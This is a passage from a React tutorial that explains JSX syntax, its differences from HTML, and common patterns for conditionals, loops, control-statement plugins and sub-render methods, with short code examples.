describe the tree of elements and compose complex UIs. A basic example could be a link with a text inside it: <a href="https://facebook.github.io/react/">Click me!</a> Which would be transpiled into: React.createElement( "a", { href: "https://facebook.github.io/react/" }, "Click me!" ); Our link can be enclosed inside a div for some layout requirements and the JSX snippet to achieve that is the following: <div> <a href="https://facebook.github.io/react/">Click me!</a> </div> With the JSX equivalent being: React.createElement( "div", null, React.createElement( "a", { href: "https://facebook.github.io/react/" }, "Click me!" ) ); It becomes now clear how the XML-like syntax of JSX makes everything more readable and maintainable but it is always important to know what is the JavaScript parallel of our JSX to take control over the creation of elements. 
Differences with HTML

So far we have seen how JSX is similar to HTML; let's now see the little differences between them, and the reasons why they exist.

Attributes

We always have to keep in mind that JSX is not a standard language and that it gets transpiled into JavaScript; because of that, some attributes cannot be used. For example, instead of class we have to use className, and instead of for we have to use htmlFor:

<label className="awesome-label" htmlFor="name" />

The reason is that class and for are reserved words in JavaScript.

Style

A pretty significant difference is the way the style attribute works. The style attribute does not accept a CSS string as its HTML parallel does; instead, it expects a JavaScript object where the style names are camelCased:

<div style={{ backgroundColor: 'red' }} />

Root

One important difference with HTML worth mentioning is that, since JSX elements get translated into JavaScript functions, and you cannot return two functions in JavaScript, whenever you have multiple elements at the same level you are forced to wrap them in a parent. Let's see a simple example:

<div />
<div />

This gives us the following error:

Adjacent JSX elements must be wrapped in an enclosing tag

While this works:

<div>
  <div />
  <div />
</div>

It is pretty annoying to have to add unnecessary div tags just to make JSX work, but the React developers are trying to find a solution:
https://github.com/reactjs/core-notes/blob/master/2016-07/july-07.md

Spaces

There's one thing that can be a little tricky at the beginning, and again it concerns the fact that JSX is not HTML, even if it has an XML-like syntax. JSX, in fact, handles the spaces between text and elements differently from HTML, in a way that is counter-intuitive. Consider the following snippet:

<div>
  <span>foo</span>
  bar
  <span>baz</span>
</div>

In the browser, which interprets HTML, this code would give you "foo bar baz", which is exactly what we expect. In JSX, instead, the same code would be rendered as "foobarbaz", because the three nested lines get transpiled as individual children of the div element, without taking the spaces into account. A common solution is to put a space explicitly between the elements:

<div>
  <span>foo</span>
  {' '}
  bar
  {' '}
  <span>baz</span>
</div>

As you may have noticed, we are using a string containing a single space, wrapped inside a JavaScript expression, to force the compiler to apply the space between the elements.

Boolean Attributes

A couple more things are worth mentioning before we start for real, and they regard the way you define Boolean attributes in JSX. If you set an attribute without a value, JSX assumes that its value is true, following the behavior of the HTML disabled attribute, for example. That means that if we want to set an attribute to false, we have to declare it explicitly as false:

<button disabled />
React.createElement("button", { disabled: true });

And:

<button disabled={false} />
React.createElement("button", { disabled: false });

This can be confusing in the beginning, because we may think that omitting an attribute means false, but it is not like that: with React we should always be explicit to avoid confusion.
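As a quick recap of these differences, the small sketch below (the Field component and its readOnly prop are made up for the example) shows className, htmlFor, the style object, and an explicit Boolean attribute working together:

const Field = (props) => (
  // style takes a camelCased object, the label uses className and htmlFor,
  // and the Boolean disabled attribute is set explicitly from a prop.
  <div style={{ backgroundColor: 'lightgrey', marginTop: 10 }}>
    <label className="field-label" htmlFor="email">Email</label>
    <input id="email" type="email" disabled={props.readOnly} />
  </div>
)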
Spread attributes

An important feature is the spread attributes operator, which comes from the Rest/Spread Properties for ECMAScript proposal and is very convenient whenever we want to pass all the attributes of a JavaScript object to an element. A common practice that leads to fewer bugs is not to pass entire JavaScript objects down to children by reference, but to use their primitive values, which can be easily validated, making components more robust and error-proof. Let's see how it works:

const foo = { bar: 'baz' }
return <div {...foo} />

That gets transpiled into this:

var foo = { bar: 'baz' };
return React.createElement('div', foo);

JavaScript templating

Last but not least, we started from the point that one of the advantages of moving the templates inside our components, instead of using an external template library, is that we can use the full power of JavaScript, so let's start looking at what that means. The spread attributes operator is obviously an example of that, and another common one is that JavaScript expressions can be used as attribute values by wrapping them in curly braces:

<button disabled={errors.length} />

Now that we know how JSX works and master it, we are ready to see how to use it in the right way, following some useful conventions and techniques.

Common Patterns

Multi-line

Let's start with a very simple one: as we said, one of the main reasons why we should prefer JSX over React's createElement is its XML-like syntax and the way balanced opening and closing tags are perfect for representing a tree of nodes. Therefore, we should try to use it in the right way and get the most out of it. One example is that, whenever we have nested elements, we should always go multi-line:

<div>
  <Header />
  <div>
    <Main content={...} />
  </div>
</div>

Instead of:

<div><Header /><div><Main content={...} /></div></div>

The exception is when the children are not elements, such as text or variables. In that case it can make sense to remain on the same line and avoid adding noise to the markup, like:

<div>
  <Alert>{message}</Alert>
  <Button>Close</Button>
</div>

Always remember to wrap your elements inside parentheses when you write them on multiple lines. In fact, JSX always gets replaced by functions, and functions written on a new line can give you an unexpected result. Suppose, for example, that you are returning JSX from your render method, which is how you create UIs in React. The following example works fine because the div is on the same line as the return:

return <div />

While this is not right:

return
  <div />

Because you would have:

return;
React.createElement("div", null);

That is why you have to wrap the statement in parentheses:

return (
  <div />
)

Multi-properties

A common problem in writing JSX comes when an element has multiple attributes. One solution would be to write all the attributes on the same line, but this would lead to very long lines, which we do not want in our code (see the next section for how to enforce coding style guides). A common solution is to write each attribute on a new line, with one level of indentation, and then to put the closing bracket aligned with the opening tag:

<button
  foo="bar"
  veryLongPropertyName="baz"
  onSomething={this.handleSomething}
/>
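Combining the two conventions, a render method might end up looking like the following sketch; the form, its handler, and the Button component are hypothetical and only serve to show the multi-line and multi-property formatting together:

render() {
  // The returned tree is wrapped in parentheses because it spans multiple
  // lines, and the form's attributes sit one per line with the closing
  // bracket aligned with the opening tag.
  return (
    <form
      className="login-form"
      autoComplete="off"
      onSubmit={this.handleSubmit}
    >
      <input type="text" name="username" />
      <input type="password" name="password" />
      <Button>Login</Button>
    </form>
  )
}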
Conditionals

Things get more interesting when we start working with conditionals, for example if we want to render some components only when certain conditions are matched. The fact that we can use JavaScript is obviously a plus, but there are many different ways to express conditions in JSX, and it is important to understand the benefits and the problems of each of them to write code that is readable and maintainable at the same time. Suppose we want to show a logout button only if the user is currently logged into our application. A simple snippet to start with is the following:

let button
if (isLoggedIn) {
  button = <LogoutButton />
}
return <div>{button}</div>

It works, but it is not very readable, especially if there are multiple components and multiple conditions. What we can do in JSX is use an inline condition:

<div>
  {isLoggedIn && <LogoutButton />}
</div>

This works because if the condition is false, nothing gets rendered, but if the condition is true, the createElement function of the LogoutButton gets called and the element is returned to compose the resulting tree. If the condition has an alternative (the classic if...else statement) and we want, for example, to show a logout button if the user is logged in and a login button otherwise, we can either use JavaScript's if...else:

let button
if (isLoggedIn) {
  button = <LogoutButton />
} else {
  button = <LoginButton />
}
return <div>{button}</div>

Or, better, use a ternary condition, which makes our code more compact:

<div>
  {isLoggedIn ? <LogoutButton /> : <LoginButton />}
</div>

You can find the ternary condition used in popular repositories like the Redux real world example (https://github.com/reactjs/redux/blob/master/examples/real-world/src/components/List.js), where the ternary is used to show a loading label if the component is fetching the data, or "Load More" inside a button, according to the value of the isFetching variable:

<button [...]>
  {isFetching ? 'Loading...' : 'Load More'}
</button>

Let's now see what the best solution is when things get more complicated and, for example, we have to check more than one variable to determine whether to render a component or not:

<div>
  {dataIsReady && (isAdmin || userHasPermissions) && <SecretData />}
</div>

In this case it is clear that using the inline condition is a good solution, but the readability is strongly impacted, so what we can do instead is create a helper function inside our component and use it in JSX to verify the condition:

canShowSecretData() {
  const { dataIsReady, isAdmin, userHasPermissions } = this.props
  return dataIsReady && (isAdmin || userHasPermissions)
}

<div>
  {this.canShowSecretData() && <SecretData />}
</div>

As you can see, this change makes the code more readable and the condition more explicit. Looking at this code in six months' time, you will still find it clear just by reading the name of the function. If you do not like using functions, you can use object getters, which make the code more elegant. For example, instead of declaring a function we define a getter:

get canShowSecretData() {
  const { dataIsReady, isAdmin, userHasPermissions } = this.props
  return dataIsReady && (isAdmin || userHasPermissions)
}

<div>
  {this.canShowSecretData && <SecretData />}
</div>

The same applies to computed properties: suppose you have two single properties for currency and value. Instead of creating the price string inside your render method, you can create a class function for that:

getPrice() {
  return `${this.props.currency}${this.props.value}`
}

<div>{this.getPrice()}</div>

This is better because it is isolated, and you can easily test it in case it contains logic. Alternatively, going a step further and, as we have just seen, using getters:

get price() {
  return `${this.props.currency}${this.props.value}`
}

<div>{this.price}</div>
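To make it clearer where these getters live, here is a sketch of a complete component using both of them; the Product name is invented, and it assumes SecretData exists in scope and that the es2015 class syntax used elsewhere in this article is available:

class Product extends React.Component {
  // Getter for the computed price string.
  get price() {
    return `${this.props.currency}${this.props.value}`
  }

  // Getter that encapsulates the visibility condition.
  get canShowSecretData() {
    const { dataIsReady, isAdmin, userHasPermissions } = this.props
    return dataIsReady && (isAdmin || userHasPermissions)
  }

  render() {
    return (
      <div>
        <p>{this.price}</p>
        {this.canShowSecretData && <SecretData />}
      </div>
    )
  }
}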
Going back to conditional statements, there are other solutions that require using external dependencies. A good practice is to avoid external dependencies as much as we can, to keep our bundle smaller, but it may be worth it in this particular case, because improving the readability of our templates is a big win. The first solution is renderIf, which we can install with:

npm install --save render-if

And easily use in our projects like this:

const { dataIsReady, isAdmin, userHasPermissions } = this.props
const canShowSecretData = renderIf(dataIsReady && (isAdmin || userHasPermissions))

<div>
  {canShowSecretData(<SecretData />)}
</div>

We wrap our condition inside the renderIf function. The utility function that gets returned can then be called with the JSX markup to be shown when the condition is true. One goal that we should always keep in mind is never to put too much logic inside our components. Some of them will obviously require a bit of it, but we should try to keep them as simple and dumb as possible, so that we can spot and fix errors easily. At the very least, we should try to keep the condition we pass to renderIf as clean as possible; to go further, we could use another utility library called react-only-if, which lets us write our components as if the condition were always true, by setting the conditional function using a higher-order component. To use the library, we just need to install it:

npm install --save react-only-if

Once it is installed, we can use it in our apps in the following way:

const SecretDataOnlyIf = onlyIf(
  SecretData,
  ({ dataIsReady, isAdmin, userHasPermissions }) => {
    return dataIsReady && (isAdmin || userHasPermissions)
  }
)

<div>
  <SecretDataOnlyIf
    dataIsReady={...}
    isAdmin={...}
    userHasPermissions={...}
  />
</div>

As you can see, here there is no logic at all inside the component itself. We pass the condition as the second parameter of the onlyIf function; when the condition is matched, the component gets rendered. The function used to validate the condition receives the props, the state, and the context of the component. In this way we avoid polluting our component with conditionals, so that it is easier to understand and reason about.

Loops

A very common operation in UI development is displaying lists of items. When it comes to showing lists, we realize that using JavaScript as a template language is a very good idea. If we write a function that returns an array inside our JSX template, each element of the array gets compiled into an element. As we have seen before, we can use any JavaScript expression inside curly braces, and the most obvious way to generate an array of elements, given an array of objects, is using map. Let's dive into a real-world example: suppose you have a list of users, each one with a name property attached to it. To create an unordered list showing the users, you can do:

<ul>
  {users.map(user => <li>{user.name}</li>)}
</ul>

This snippet is incredibly simple and incredibly powerful at the same time; it is where the power of HTML and JavaScript converge.
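One detail worth adding: when elements are generated from an array, React expects a key prop on each of them so it can track items across re-renders. Assuming each user object has a stable id (an assumption for this sketch), the list would look like this:

<ul>
  {users.map(user => (
    // The key helps React match list items between renders.
    <li key={user.id}>{user.name}</li>
  ))}
</ul>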
Control Statements

Conditionals and loops are very common operations in UI templates, and you may feel it is wrong to use the JavaScript ternary or the map function for them. JSX has been built in a way that it only abstracts the creation of the elements, leaving the logic parts to real JavaScript, which is great, but sometimes the code can become less clear. In general, we aim to remove all the logic from our components, and especially from our render methods, but sometimes we have to show and hide elements according to the state of the application, and very often we have to loop through collections and arrays. If you feel that using JSX for that kind of operation would make your code more readable, there is a Babel plugin for that: jsx-control-statements. It follows the same philosophy as JSX, and it does not add any real functionality to the language; it is just syntactic sugar that gets compiled into JavaScript. Let's see how it works. First of all, we have to install it:

npm install --save jsx-control-statements

Once it is installed, we have to add it to the list of Babel plugins in our .babelrc file:

"plugins": ["jsx-control-statements"]

From now on we can use the syntax provided by the plugin, and Babel will transpile it together with the common JSX syntax. A conditional statement written using the plugin looks like the following snippet:

<If condition={this.canShowSecretData}>
  <SecretData />
</If>

Which gets transpiled into a ternary expression:

{canShowSecretData ? <SecretData /> : null}

The If component is great, but if for some reason you have nested conditions in your render method, it can easily become messy and hard to follow. This is where the Choose component comes to help:

<Choose>
  <When condition={...}>
    <span>if</span>
  </When>
  <When condition={...}>
    <span>else if</span>
  </When>
  <Otherwise>
    <span>else</span>
  </Otherwise>
</Choose>

Please note that the code above gets transpiled into multiple ternaries. Last but not least, there is a "component" (always remember that we are not talking about real components, just syntactic sugar) to manage loops, which is very convenient as well:

<ul>
  <For each="user" of={this.props.users}>
    <li>{user.name}</li>
  </For>
</ul>

The code above gets transpiled into a map function; no magic there. If you are used to using linters, you might wonder why the linter is not complaining about that code. In fact, the variable user doesn't exist before the transpilation, nor is it wrapped in a function. To avoid those linting errors there's another plugin to install: eslint-plugin-jsx-control-statements. If you did not understand the previous sentence, don't worry: in the next section we will talk about linting.

Sub-render

It is worth stressing that we always want to keep our components very small and our render methods very clean and simple. However, that is not an easy goal, especially when you are creating an application iteratively and, in the first iteration, you are not sure exactly how to split the components into smaller ones. So, what should we do when the render method becomes too big, to keep it maintainable? One solution is splitting it into smaller functions, in a way that lets us keep all the logic in the same component. Let's see an example:

renderUserMenu() {
  // JSX for user menu
}

renderAdminMenu() {
  // JSX for admin menu
}

render() {
  return (
    <div>
      <h1>Welcome back!</h1>
      {this.userExists && this.renderUserMenu()}
      {this.userIsAdmin && this.renderAdminMenu()}
    </div>
  )
}

This is not always considered a best practice, because it seems more obvious to split the component into smaller ones, but sometimes it helps just to keep the render method cleaner.
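To give an idea of what those placeholder comments might contain, the sketch below fills in one of the sub-render methods with hypothetical menu markup; the routes and class names are invented for illustration:

renderUserMenu() {
  // Hypothetical user menu, returned as a small, self-contained JSX tree.
  return (
    <ul className="user-menu">
      <li><a href="/profile">Profile</a></li>
      <li><a href="/logout">Logout</a></li>
    </ul>
  )
}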
For example, in the Redux real world example, a sub-render method is used to render the load more button. Now that we are JSX power users, it is time to move on and see how to follow a style guide within our code to keep it consistent.

Summary

In this article we developed a deep understanding of how JSX works and how to use it the right way in our components. We started from the basics of the syntax to build a solid knowledge base that will let us master JSX and its features.